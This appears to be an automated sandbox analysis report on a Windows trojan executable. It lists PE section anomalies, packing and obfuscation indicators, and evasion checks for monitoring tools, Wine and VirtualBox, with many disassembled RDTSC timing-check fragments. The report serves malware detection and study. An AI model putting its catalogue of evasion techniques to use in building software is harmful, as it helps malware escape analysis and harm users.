Source: file.exe | Static PE information: Section: tcmgcthi ZLIB complexity 0.9945983701426837
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00423A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\7VN3CYW7.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1792512 > 1048576
Source: file.exe | Static PE information: Raw size of tcmgcthi is bigger than: 0x100000 < 0x19bc00
Source: Binary string: O&.Pdb | source: file.exe

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tcmgcthi:EW;suhmtczi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tcmgcthi:EW;suhmtczi:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00426390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b5b36 should be: 0x1bbb9d
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: tcmgcthi
              Source: file.exeStatic PE information: section name: suhmtczi
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF86C push ebp; mov dword ptr [esp], ecx 0_2_007CF894
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083F8A0 push ebx; mov dword ptr [esp], 5FE7128Eh 0_2_0083F8C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083F8A0 push ecx; mov dword ptr [esp], ebp 0_2_0083F8FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F0852 push ebp; mov dword ptr [esp], 4E9FEF27h 0_2_007F0874
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F0852 push edx; mov dword ptr [esp], eax 0_2_007F0901
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008620B6 push ebp; mov dword ptr [esp], 5623FCF2h 0_2_008620D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008448B7 push 1723BBBBh; mov dword ptr [esp], ebx 0_2_008448DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008348B4 push esi; mov dword ptr [esp], edx 0_2_008348E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0043 push 1142E200h; mov dword ptr [esp], ebp 0_2_007D008D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DC8C8 push 285E9500h; mov dword ptr [esp], eax 0_2_008DC91D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push 16962A22h; mov dword ptr [esp], esi 0_2_00751898
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ecx; mov dword ptr [esp], ebx 0_2_007518CA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push 0A43E341h; mov dword ptr [esp], edx 0_2_007519C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ecx; mov dword ptr [esp], ebx 0_2_007519CD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ebx; mov dword ptr [esp], edx 0_2_007519E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050E7 push 727BD85Ch; mov dword ptr [esp], ecx 0_2_0080524E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AD802 push 36AC93E0h; mov dword ptr [esp], ebx 0_2_008AD81D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F013 push 3509FDD5h; mov dword ptr [esp], ebp 0_2_0088F494
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DF036 push ebp; mov dword ptr [esp], eax 0_2_008DF0BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DF036 push eax; mov dword ptr [esp], edx 0_2_008DF1B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B50BB push 0A490BCAh; mov dword ptr [esp], edx 0_2_006B50E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B50BB push ebx; mov dword ptr [esp], 00000000h 0_2_006B518E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427895 push ecx; ret 0_2_004278A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ebx; mov dword ptr [esp], ecx 0_2_007B98D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ebx; mov dword ptr [esp], edx 0_2_007B9900
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 6B0486E7h; mov dword ptr [esp], eax 0_2_007B9920
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 5DCF5ABBh; mov dword ptr [esp], edx 0_2_007B9941
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ecx; mov dword ptr [esp], ebx 0_2_007B9986
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 3781C2E8h; mov dword ptr [esp], esi 0_2_007B9A84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push eax; mov dword ptr [esp], ebx 0_2_007B9ADB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 4AF6DE8Dh; mov dword ptr [esp], edx 0_2_007B9B22
              Source: file.exeStatic PE information: section name: tcmgcthi entropy: 7.953211456114112

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00426390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-25981
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6500DA second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FE4C10F4F68h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f jmp 00007FE4C10F4F72h 0x00000014 push dword ptr [ebp+122D1615h] 0x0000001a mov dword ptr [ebp+122D3876h], eax 0x00000020 call dword ptr [ebp+122D1B95h] 0x00000026 pushad 0x00000027 jmp 00007FE4C10F4F73h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f push ecx 0x00000030 mov dword ptr [ebp+122D17ECh], eax 0x00000036 pop edi 0x00000037 add dword ptr [ebp+122D3870h], edi 0x0000003d popad 0x0000003e jbe 00007FE4C10F4F6Ch 0x00000044 mov dword ptr [ebp+122D3870h], edx 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e jp 00007FE4C10F4F72h 0x00000054 js 00007FE4C10F4F6Ch 0x0000005a mov dword ptr [ebp+122D3870h], eax 0x00000060 mov dword ptr [ebp+122D2AE8h], eax 0x00000066 pushad 0x00000067 add dword ptr [ebp+122D3870h], eax 0x0000006d popad 0x0000006e mov esi, 0000003Ch 0x00000073 jmp 00007FE4C10F4F6Ch 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c mov dword ptr [ebp+122D17E1h], edx 0x00000082 lodsw 0x00000084 jmp 00007FE4C10F4F75h 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d cld 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 jmp 00007FE4C10F4F77h 0x00000097 nop 0x00000098 pushad 0x00000099 jmp 00007FE4C10F4F6Eh 0x0000009e pushad 0x0000009f push eax 0x000000a0 push edx 0x000000a1 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1C9C second address: 7C1CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1CA5 second address: 7C1CAF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C10F4F79h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1CAF second address: 7C1CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF33D second address: 7CF343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF4DB second address: 7CF4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE4C120028Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7A2 second address: 7CF7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7A7 second address: 7CF7D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE4C1200290h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007FE4C1200290h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FE4C1200286h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF956 second address: 7CF97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jl 00007FE4C10F4F92h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE4C10F4F74h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF97C second address: 7CF980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF980 second address: 7CF986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C9A second address: 7D1C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C9E second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE4C10F4F6Ch 0x0000000c popad 0x0000000d add dword ptr [esp], 078A96DAh 0x00000014 pushad 0x00000015 mov ebx, 0DDA0F3Bh 0x0000001a mov edx, ebx 0x0000001c popad 0x0000001d push dword ptr [ebp+122D1615h] 0x00000023 call dword ptr [ebp+122D1B95h] 0x00000029 pushad 0x0000002a jmp 00007FE4C10F4F73h 0x0000002f xor eax, eax 0x00000031 pushad 0x00000032 push ecx 0x00000033 mov dword ptr [ebp+122D17ECh], eax 0x00000039 pop edi 0x0000003a add dword ptr [ebp+122D3870h], edi 0x00000040 popad 0x00000041 jbe 00007FE4C10F4F6Ch 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jp 00007FE4C10F4F72h 0x00000051 js 00007FE4C10F4F6Ch 0x00000057 mov dword ptr [ebp+122D3870h], eax 0x0000005d mov dword ptr [ebp+122D2AE8h], eax 0x00000063 pushad 0x00000064 add dword ptr [ebp+122D3870h], eax 0x0000006a popad 0x0000006b mov esi, 0000003Ch 0x00000070 jmp 00007FE4C10F4F6Ch 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 mov dword ptr [ebp+122D17E1h], edx 0x0000007f lodsw 0x00000081 jmp 00007FE4C10F4F75h 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a cld 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jmp 00007FE4C10F4F77h 0x00000094 nop 0x00000095 pushad 0x00000096 jmp 00007FE4C10F4F6Eh 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1D53 second address: 7D1D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1D60 second address: 7D1DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xor dword ptr [esp], 01877894h 0x0000000d jmp 00007FE4C10F4F74h 0x00000012 xor dh, FFFFFFBAh 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE4C10F4F68h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D19F0h], edx 0x00000037 mov ecx, dword ptr [ebp+122D29BCh] 0x0000003d push 00000000h 0x0000003f mov ch, bl 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007FE4C10F4F68h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d mov cx, 0BA1h 0x00000061 mov ecx, dword ptr [ebp+122D2C74h] 0x00000067 push 44D5563Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e push edi 0x0000006f jns 00007FE4C10F4F66h 0x00000075 pop edi 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1DF1 second address: 7D1E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200292h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E07 second address: 7D1E52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7B2AA9C4h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE4C10F4F68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+12455C07h] 0x0000002f mov dword ptr [ebp+122D2434h], ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jnl 00007FE4C10F4F66h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E52 second address: 7D1E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E6B second address: 7D1E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F28 second address: 7D1F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F2E second address: 7D1F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F32 second address: 7D1F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4F8CCADEh 0x0000000f jo 00007FE4C120028Ch 0x00000015 mov dword ptr [ebp+122D1963h], edx 0x0000001b push 00000003h 0x0000001d mov edx, dword ptr [ebp+122D2914h] 0x00000023 push 00000000h 0x00000025 or dh, 00000024h 0x00000028 push 00000003h 0x0000002a mov edx, dword ptr [ebp+122D2A24h] 0x00000030 mov dx, 2B30h 0x00000034 push 791C0BC6h 0x00000039 jg 00007FE4C120028Eh 0x0000003f add dword ptr [esp], 46E3F43Ah 0x00000046 or esi, 2A1452CFh 0x0000004c lea ebx, dword ptr [ebp+12455C10h] 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F91 second address: 7D1F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1FF1 second address: 7D1FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1FF7 second address: 7D2011 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4C10F4F6Ch 0x00000008 jns 00007FE4C10F4F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 jne 00007FE4C10F4F6Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2011 second address: 7D2069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 movsx edx, cx 0x00000009 push 00000000h 0x0000000b xor dword ptr [ebp+122D28E9h], ebx 0x00000011 push CE16D917h 0x00000016 pushad 0x00000017 jnc 00007FE4C1200288h 0x0000001d push esi 0x0000001e push edx 0x0000001f pop edx 0x00000020 pop esi 0x00000021 popad 0x00000022 add dword ptr [esp], 31E92769h 0x00000029 jmp 00007FE4C120028Fh 0x0000002e push 00000003h 0x00000030 sbb edi, 208EADB2h 0x00000036 push 00000000h 0x00000038 movzx esi, ax 0x0000003b push 00000003h 0x0000003d xor si, 10E6h 0x00000042 push 8BC5CF01h 0x00000047 push eax 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2069 second address: 7D206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2708 second address: 7F270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5AC second address: 7BE5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Ch 0x00000007 jmp 00007FE4C10F4F6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5CB second address: 7BE5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5CF second address: 7BE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FE4C10F4F95h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5DE second address: 7BE5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE4C1200286h 0x0000000d jo 00007FE4C1200286h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0BC2 second address: 7F0BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F72h 0x00000007 pushad 0x00000008 jns 00007FE4C10F4F66h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0FA7 second address: 7F0FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jl 00007FE4C1200294h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0FB9 second address: 7F0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F10FB second address: 7F1116 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE4C1200288h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE4C120028Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1116 second address: 7F111A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F17EF second address: 7F1805 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FE4C1200286h 0x0000000d jo 00007FE4C1200286h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1DE8 second address: 7F1DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1F82 second address: 7F1F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F20B3 second address: 7F20B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2259 second address: 7F2267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2267 second address: 7F2289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Eh 0x00000007 jnl 00007FE4C10F4F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FE4C10F4F66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2289 second address: 7F228D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E761C second address: 7E764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FE4C10F4F6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE4C10F4F77h 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2596 second address: 7F259B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F417A second address: 7F417F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4879 second address: 7F487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
